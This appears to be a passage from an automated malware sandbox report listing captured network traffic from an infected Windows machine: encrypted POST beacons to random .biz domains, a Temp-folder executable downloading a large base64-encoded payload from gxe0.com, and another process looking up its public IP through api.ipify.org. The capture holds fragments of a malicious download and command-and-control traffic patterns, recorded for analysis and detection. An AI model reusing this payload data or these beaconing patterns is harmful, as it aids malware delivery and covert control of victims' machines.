                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057321072 CET832OUTData Raw: 8c a2 cb 40 7f 9e a3 9d 34 03 00 00 e5 d7 5b 59 6c 0b 85 d4 2a 7d a0 70 82 cf f1 2d cc d2 f1 1d a9 c1 d4 49 16 04 60 68 e3 9b 35 61 61 4b 03 ec 17 db 3a 0f 7f 12 35 91 ae c3 1d dd ce b4 5d 83 34 7b 8e c4 42 47 cd 5b bc 9e 8d f9 51 88 c8 7a 56 87
                                                                                                                                                                                                                                                                                                                                Data Ascii: @4[Yl*}p-I`h5aaK:5]4{BG[QzVnO%r%qy^jS6.(/l`A1Ht(o8$jY[>w!:,}Db&"[4qdNc?^[+tj4J>]L
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519124985 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:57 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e7cd19b3113d3921d58bd46d532a9762|8.46.123.75|1732094817|1732094817|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                55192.168.2.55004113.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544234037 CET358OUTPOST /rrrklmujfcwnchb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544248104 CET832OUTData Raw: ee 9a 9b 7d 53 ca 2c a6 34 03 00 00 93 a4 6d f2 ff 73 90 7d b0 cd c0 02 cc 59 01 5c 6e 13 65 b2 8f e0 3e 32 79 10 f6 67 17 a8 1f e5 0e ee 98 30 1d 1c 8c 56 71 86 25 ec 6c 8d 05 8b 63 d1 a8 45 4d d4 52 f9 6c a0 25 ad a8 a7 59 e5 28 c6 d7 92 14 5f
                                                                                                                                                                                                                                                                                                                                Data Ascii: }S,4ms}Y\ne>2yg0Vq%lcEMRl%Y(_;rIiVI-:6H7hz@o6hqIHb>b5b:#VY+tcNOsciXnvqW&TGa~5eV#*w92#i2D~T
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959669113 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:58 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=b33057b44cd2d61c51ecc977a33f9445|8.46.123.75|1732094818|1732094818|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                56192.168.2.5500433.94.10.3480
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979625940 CET359OUTPOST /pggbsfikilutqo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979665995 CET832OUTData Raw: 1e 12 3d 18 20 33 a7 ae 34 03 00 00 27 49 90 f5 c7 d1 dd 0f 4e 2f 9a 38 6c 0e bf 67 52 8b e9 9b 5e 46 dd 64 f4 04 fe ab 18 56 12 3a 88 ba c1 c3 02 80 cc 86 05 30 76 7a c5 fb 6c 0b de b4 97 56 dc 7c be 6d c1 6c cc 26 d9 bb da 47 7b 53 ff b1 1d 33
                                                                                                                                                                                                                                                                                                                                Data Ascii: = 34'IN/8lgR^FdV:0vzlV|ml&G{S3L2YXe!p|{=DLmp#X+I)2eBtx-W*nj4J<aXk|2HkB2z\DQd]a[
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453226089 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:27:00 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=349a3068f024a3887213cb3da09c2e14|8.46.123.75|1732094820|1732094820|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.549705198.252.105.914437096C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC162OUTGET /yak2/233_Juqmtmyadyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                Host: gxe0.com
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                last-modified: Thu, 14 Nov 2024 22:46:27 GMT
                                                                                                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                content-length: 3182288
                                                                                                                                                                                                                                                                                                                                date: Wed, 20 Nov 2024 09:24:34 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 41 42 65 38 51 43 4a 4b 32 34 6b 4c 41 59 78 71 65 6d 4b 4e 61 4e 72 7a 4a 4a 68 65 30 4e 41 64 6a 66 46 4f 44 2b 67 6c 78 48 76 7a 6e 75 42 4b 38 78 2b 78 43 47 76 47 41 42 77 48 69 54 37 63 38 2b 7a 46 57 37 72 2f 4a 4e 6d 4e 7a 4b 57 61 4b 4b 49 53 31 44 52 4e 4f 6d 49 69 47 50 74 6f 4b 79 56 55 49 70 32 45 57 69 69 68 61 6e 6e 68 61 76 6d 33 54 59 6a 53 48 58 70 72 59 32 4b 57 76 67 69 42 63 36 62 46 6e 6b 78 33 32 65 52 4f 38 4e 48 69 31 32 46 54 42 34 49 6e 4d 6b 4b 35 58 44 59 34 56 6a 35 66 49 62 63 68 63 48 5a 74 47 52 64 64 30 48 75 67 58 6f 67 50 32 66 4c 45 46 65 37 43 62 4c 30 73 45 52 73 43 41 62 53 42 73 2f 7a 47 33 48 46 4e 68 72 4f 61 59 4c 43 52 37 78 41 73 4e 4b 74 62 6f 48 42 43 30 57 44 32 57 31 64 33 52 74 59 44 71 42 54 78 56 42 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: ABe8QCJK24kLAYxqemKNaNrzJJhe0NAdjfFOD+glxHvznuBK8x+xCGvGABwHiT7c8+zFW7r/JNmNzKWaKKIS1DRNOmIiGPtoKyVUIp2EWiihannhavm3TYjSHXprY2KWvgiBc6bFnkx32eRO8NHi12FTB4InMkK5XDY4Vj5fIbchcHZtGRdd0HugXogP2fLEFe7CbL0sERsCAbSBs/zG3HFNhrOaYLCR7xAsNKtboHBC0WD2W1d3RtYDqBTxVBg
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 71 50 57 2b 4c 2f 71 44 6b 46 4b 32 36 6e 36 70 78 5a 71 59 4f 36 64 34 6b 55 61 57 4a 6f 6f 49 79 52 64 6b 50 59 77 70 55 47 30 63 65 68 6f 52 6e 35 2b 6a 49 6e 58 6b 46 50 31 38 69 4f 53 69 49 4b 67 72 47 4b 4e 32 53 2f 6b 68 59 43 61 2f 51 47 51 78 4c 6c 4a 51 47 4a 4c 32 36 47 52 35 6c 45 30 56 73 36 49 4c 41 75 49 71 71 37 33 37 58 52 5a 68 43 7a 6d 5a 5a 47 78 68 64 33 4c 36 73 6d 39 7a 2b 55 6a 72 65 71 43 50 49 46 39 4f 6a 47 78 79 42 6d 30 48 51 65 6d 37 4d 6e 77 56 66 41 75 57 59 6c 6c 6d 45 33 4e 74 64 5a 77 69 59 59 54 41 31 4b 33 6c 72 54 6b 57 42 45 6b 37 63 6a 46 79 6d 56 39 7a 59 6e 53 55 45 42 61 51 44 4b 70 64 76 69 64 69 59 61 79 56 59 44 62 43 36 74 4d 77 6a 33 61 4c 74 52 6e 56 78 51 37 64 34 61 57 44 58 57 66 62 62 77 31 30 54 32 4a
                                                                                                                                                                                                                                                                                                                                Data Ascii: qPW+L/qDkFK26n6pxZqYO6d4kUaWJooIyRdkPYwpUG0cehoRn5+jInXkFP18iOSiIKgrGKN2S/khYCa/QGQxLlJQGJL26GR5lE0Vs6ILAuIqq737XRZhCzmZZGxhd3L6sm9z+UjreqCPIF9OjGxyBm0HQem7MnwVfAuWYllmE3NtdZwiYYTA1K3lrTkWBEk7cjFymV9zYnSUEBaQDKpdvidiYayVYDbC6tMwj3aLtRnVxQ7d4aWDXWfbbw10T2J
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 56 31 79 7a 71 30 36 6f 78 35 37 2b 62 72 6e 78 74 61 43 66 6e 69 75 55 33 39 35 4b 58 57 32 69 71 43 4c 71 7a 30 69 6d 44 75 4c 32 4c 66 6d 55 68 39 68 5a 31 37 54 42 46 77 6c 44 55 64 72 36 77 55 56 61 36 73 6b 71 53 6a 77 6d 4c 34 37 4f 53 59 75 6a 6f 73 33 74 45 4f 66 59 55 39 7a 4f 64 66 35 41 54 5a 37 32 42 6c 55 41 64 79 78 4c 31 2f 38 2f 37 37 7a 76 70 39 30 36 72 43 53 76 6f 72 56 63 75 65 50 54 39 72 66 5a 43 42 77 6f 74 51 54 39 47 41 52 4b 6f 37 46 42 4e 32 65 46 77 2b 63 57 47 35 30 59 67 69 46 64 6b 66 2f 67 42 76 4f 66 55 6d 2f 35 79 47 65 73 34 34 52 66 4a 6d 57 73 59 57 74 77 61 56 54 5a 6a 53 43 46 57 59 77 72 77 39 43 54 50 47 31 75 58 58 47 79 78 4e 63 43 65 65 31 6c 74 5a 4e 4a 38 45 51 62 51 51 68 71 66 35 52 5a 72 6b 79 61 6d 75 4a
                                                                                                                                                                                                                                                                                                                                Data Ascii: V1yzq06ox57+brnxtaCfniuU395KXW2iqCLqz0imDuL2LfmUh9hZ17TBFwlDUdr6wUVa6skqSjwmL47OSYujos3tEOfYU9zOdf5ATZ72BlUAdyxL1/8/77zvp906rCSvorVcuePT9rfZCBwotQT9GARKo7FBN2eFw+cWG50YgiFdkf/gBvOfUm/5yGes44RfJmWsYWtwaVTZjSCFWYwrw9CTPG1uXXGyxNcCee1ltZNJ8EQbQQhqf5RZrkyamuJ
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 6c 39 2f 45 49 52 64 4c 30 42 36 64 36 4f 4e 6e 70 65 76 48 76 48 42 74 64 7a 79 78 58 57 36 71 59 2b 51 35 6f 65 2f 36 4d 56 35 31 42 48 56 78 58 49 53 47 6c 65 2f 73 32 6c 52 75 6b 42 37 67 41 75 48 53 72 74 52 73 41 73 36 4b 42 42 4c 47 33 57 49 66 55 65 6a 47 45 4a 62 68 58 50 41 6f 62 35 2f 6e 51 63 78 51 49 58 43 55 35 77 31 37 4c 53 5a 34 70 57 4d 6f 47 6d 51 39 47 33 59 68 70 59 30 7a 34 39 51 58 38 36 42 49 55 61 4d 63 67 61 67 74 56 41 41 41 32 58 66 67 4e 43 62 61 79 46 45 49 48 67 51 32 51 79 52 59 38 54 4c 6c 39 7a 35 6d 77 46 2b 6b 76 61 55 54 63 58 72 6e 45 75 47 38 66 6a 45 32 50 6a 50 61 34 69 65 75 79 52 4c 48 37 74 64 75 5a 36 4f 74 64 39 6d 35 41 50 76 50 37 4b 68 2f 66 6d 50 39 66 2b 77 35 53 70 78 69 77 53 6d 58 32 75 5a 4e 66 78 52
                                                                                                                                                                                                                                                                                                                                Data Ascii: l9/EIRdL0B6d6ONnpevHvHBtdzyxXW6qY+Q5oe/6MV51BHVxXISGle/s2lRukB7gAuHSrtRsAs6KBBLG3WIfUejGEJbhXPAob5/nQcxQIXCU5w17LSZ4pWMoGmQ9G3YhpY0z49QX86BIUaMcgagtVAAA2XfgNCbayFEIHgQ2QyRY8TLl9z5mwF+kvaUTcXrnEuG8fjE2PjPa4ieuyRLH7tduZ6Otd9m5APvP7Kh/fmP9f+w5SpxiwSmX2uZNfxR
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 4d 6c 76 2f 6a 6e 6d 6b 50 54 4b 36 66 42 4f 6f 4d 50 43 46 55 42 4e 39 6a 30 45 42 46 32 7a 67 6d 62 55 38 61 4f 55 61 41 6d 43 66 76 6d 6c 68 61 35 50 4c 65 36 50 65 37 4a 36 59 6d 6a 6a 30 6e 75 46 59 6c 32 78 73 65 4a 6a 51 41 56 74 6e 53 6b 65 42 55 72 47 4f 42 48 31 79 2f 43 32 4d 68 4e 49 4b 4c 73 43 6d 38 63 78 71 62 34 32 70 4b 33 4b 36 36 51 55 4b 64 62 2b 6d 35 47 41 35 47 6c 67 47 35 58 72 46 2b 70 68 68 75 66 73 63 52 76 62 46 31 58 50 70 61 33 52 45 53 6e 39 34 4d 46 48 70 2f 62 44 77 75 42 39 4a 62 32 32 63 50 61 4a 69 31 57 71 6e 45 55 6f 79 2f 68 44 61 6e 4b 7a 37 75 47 51 57 4d 68 6a 42 47 6c 52 71 53 49 49 5a 30 54 73 33 4e 62 58 30 73 48 6b 66 59 52 73 47 32 75 75 62 73 48 66 77 68 42 49 58 45 36 4d 37 62 56 42 75 51 54 35 67 68 69 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: Mlv/jnmkPTK6fBOoMPCFUBN9j0EBF2zgmbU8aOUaAmCfvmlha5PLe6Pe7J6Ymjj0nuFYl2xseJjQAVtnSkeBUrGOBH1y/C2MhNIKLsCm8cxqb42pK3K66QUKdb+m5GA5GlgG5XrF+phhufscRvbF1XPpa3RESn94MFHp/bDwuB9Jb22cPaJi1WqnEUoy/hDanKz7uGQWMhjBGlRqSIIZ0Ts3NbX0sHkfYRsG2uubsHfwhBIXE6M7bVBuQT5ghi6
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 6c 49 36 6e 50 4a 4a 67 6e 61 72 57 71 35 44 39 37 64 39 6c 30 37 46 6b 44 4c 53 5a 65 30 38 4b 71 6a 61 45 67 58 58 38 58 48 56 46 52 41 70 74 68 55 4f 56 73 68 71 58 37 46 43 2b 42 5a 4f 76 79 56 6f 72 46 54 62 30 2b 72 76 51 66 53 37 4c 59 45 59 4c 54 66 6c 48 78 49 30 73 6b 75 6c 6c 56 50 31 45 70 50 71 4a 72 32 77 69 6d 41 46 69 65 69 55 66 34 51 6c 2b 42 47 44 4a 36 48 76 37 65 30 46 79 36 6b 45 48 76 6d 7a 43 65 71 67 6b 75 68 4f 42 43 54 75 33 31 63 5a 45 52 4c 6f 52 71 47 4b 6c 6d 74 62 78 37 6d 4b 46 48 4c 4a 7a 65 6b 50 66 79 68 51 45 64 45 57 4f 4d 45 76 58 57 55 76 37 64 4c 51 50 4e 67 6c 4e 76 36 47 51 36 68 6c 50 77 78 6a 49 79 33 51 6a 6a 4d 53 68 31 4f 53 53 79 2f 6e 57 52 6d 34 35 61 65 77 72 63 6b 5a 41 61 6d 6c 64 44 67 4a 32 54 73 5a
                                                                                                                                                                                                                                                                                                                                Data Ascii: lI6nPJJgnarWq5D97d9l07FkDLSZe08KqjaEgXX8XHVFRApthUOVshqX7FC+BZOvyVorFTb0+rvQfS7LYEYLTflHxI0skullVP1EpPqJr2wimAFieiUf4Ql+BGDJ6Hv7e0Fy6kEHvmzCeqgkuhOBCTu31cZERLoRqGKlmtbx7mKFHLJzekPfyhQEdEWOMEvXWUv7dLQPNglNv6GQ6hlPwxjIy3QjjMSh1OSSy/nWRm45aewrckZAamldDgJ2TsZ
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 44 76 6c 4e 6f 58 78 47 76 52 57 4c 6c 4e 74 6a 49 2f 69 7a 57 63 79 4a 54 6d 4b 53 63 77 32 64 71 72 63 56 6a 67 4c 61 68 44 61 37 65 48 50 6c 71 48 6d 62 64 6a 4c 6f 44 5a 72 46 68 2f 35 4d 38 2f 54 42 77 54 46 6c 6e 32 31 6d 5a 73 38 66 4b 47 6f 79 42 73 68 4e 77 46 34 52 41 61 2f 58 6a 6b 2f 4c 78 59 66 61 65 70 6d 4d 65 59 4e 6b 73 33 6b 75 72 39 46 56 61 51 35 46 59 46 5a 73 35 61 36 48 49 37 6e 64 56 75 63 52 44 58 52 76 4c 67 44 7a 4b 4b 30 43 47 38 35 4b 4d 41 58 4f 70 66 38 73 38 53 6a 35 47 62 52 34 65 57 70 39 62 6e 4f 37 73 6b 69 71 43 37 61 36 79 5a 34 77 63 32 34 61 64 79 74 79 78 35 62 52 48 58 6a 31 67 34 55 79 42 71 4e 4a 68 4f 38 4d 64 34 72 6c 6f 4d 62 43 4d 76 4c 58 67 55 2f 2f 75 64 79 32 57 56 4e 44 6f 48 4d 79 76 64 67 4c 67 4b 32
                                                                                                                                                                                                                                                                                                                                Data Ascii: DvlNoXxGvRWLlNtjI/izWcyJTmKScw2dqrcVjgLahDa7eHPlqHmbdjLoDZrFh/5M8/TBwTFln21mZs8fKGoyBshNwF4RAa/Xjk/LxYfaepmMeYNks3kur9FVaQ5FYFZs5a6HI7ndVucRDXRvLgDzKK0CG85KMAXOpf8s8Sj5GbR4eWp9bnO7skiqC7a6yZ4wc24adytyx5bRHXj1g4UyBqNJhO8Md4rloMbCMvLXgU//udy2WVNDoHMyvdgLgK2
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 71 49 55 33 78 59 39 4a 6b 31 73 63 42 49 59 63 67 6e 2b 41 7a 58 67 78 50 62 62 64 32 47 79 45 77 73 63 44 44 36 37 68 51 49 45 72 75 57 32 4c 32 41 46 70 50 32 48 33 75 35 36 49 64 48 62 7a 34 36 32 78 5a 77 71 4f 64 52 48 59 49 47 59 66 51 44 73 6b 6b 51 64 58 74 4b 73 6f 44 38 62 6b 64 43 76 36 35 73 67 77 61 4d 46 72 66 68 42 75 69 75 37 43 36 49 34 4b 79 30 7a 52 56 57 65 38 55 63 4d 52 4a 33 37 6b 48 70 6b 7a 6e 58 5a 30 65 77 37 37 46 4a 6b 31 48 4d 67 65 54 52 76 7a 67 47 73 4a 33 65 78 65 36 53 35 31 4f 54 35 6a 37 68 4f 75 74 33 6a 65 30 2f 79 52 64 57 72 5a 77 59 57 62 49 56 34 32 65 2b 33 6a 4c 51 2b 4d 4b 44 6d 7a 79 53 32 66 73 58 42 77 37 55 50 41 67 41 52 71 44 4e 35 37 46 6c 66 30 57 4a 58 5a 4c 4e 74 38 6a 68 53 67 74 77 38 58 72 49 42
                                                                                                                                                                                                                                                                                                                                Data Ascii: qIU3xY9Jk1scBIYcgn+AzXgxPbbd2GyEwscDD67hQIEruW2L2AFpP2H3u56IdHbz462xZwqOdRHYIGYfQDskkQdXtKsoD8bkdCv65sgwaMFrfhBuiu7C6I4Ky0zRVWe8UcMRJ37kHpkznXZ0ew77FJk1HMgeTRvzgGsJ3exe6S51OT5j7hOut3je0/yRdWrZwYWbIV42e+3jLQ+MKDmzyS2fsXBw7UPAgARqDN57Flf0WJXZLNt8jhSgtw8XrIB
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 6b 38 34 74 42 70 4e 6f 41 5a 5a 6b 6d 54 65 72 5a 32 58 30 72 74 4e 41 4c 46 69 63 76 75 36 36 66 6f 37 67 4a 5a 49 31 55 61 6e 42 64 55 56 63 51 68 61 61 64 72 56 58 2f 76 52 70 4d 35 58 71 63 2f 31 43 49 4b 63 4c 46 54 4a 76 44 55 32 32 6b 41 4a 4d 4e 71 59 61 6b 57 2f 4f 74 71 53 59 59 33 31 75 71 6b 6e 45 39 61 49 42 30 72 4d 68 61 58 4d 57 76 73 76 77 71 32 46 2b 31 37 44 54 45 78 47 54 6e 6a 4f 61 4e 5a 73 68 2f 6d 71 65 70 4d 48 76 50 32 6e 63 64 44 79 64 54 33 6f 6e 5a 51 69 31 6d 53 50 4c 5a 42 46 35 52 70 51 5a 63 70 45 72 64 6d 47 51 43 58 2b 45 31 52 6c 31 75 6e 6c 74 71 65 37 45 51 64 48 52 55 55 70 55 57 65 45 43 71 54 6d 2b 77 6c 6e 68 35 64 62 56 57 6c 4b 74 48 6d 66 5a 31 49 6b 34 66 48 71 67 55 32 4e 31 44 66 39 47 49 4b 5a 66 51 69 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: k84tBpNoAZZkmTerZ2X0rtNALFicvu66fo7gJZI1UanBdUVcQhaadrVX/vRpM5Xqc/1CIKcLFTJvDU22kAJMNqYakW/OtqSYY31uqknE9aIB0rMhaXMWvsvwq2F+17DTExGTnjOaNZsh/mqepMHvP2ncdDydT3onZQi1mSPLZBF5RpQZcpErdmGQCX+E1Rl1unltqe7EQdHRUUpUWeECqTm+wlnh5dbVWlKtHmfZ1Ik4fHqgU2N1Df9GIKZfQil


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.549726172.67.74.1524433176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:53 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:53 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:53 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 8e5763b91dea0c90-EWR
                                                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1785932&cwnd=242&unsent_bytes=0&cid=12be056fea04a13d&ts=222&x=0"
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:53 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.549824172.67.74.1524435488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:13 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:13 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:13 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
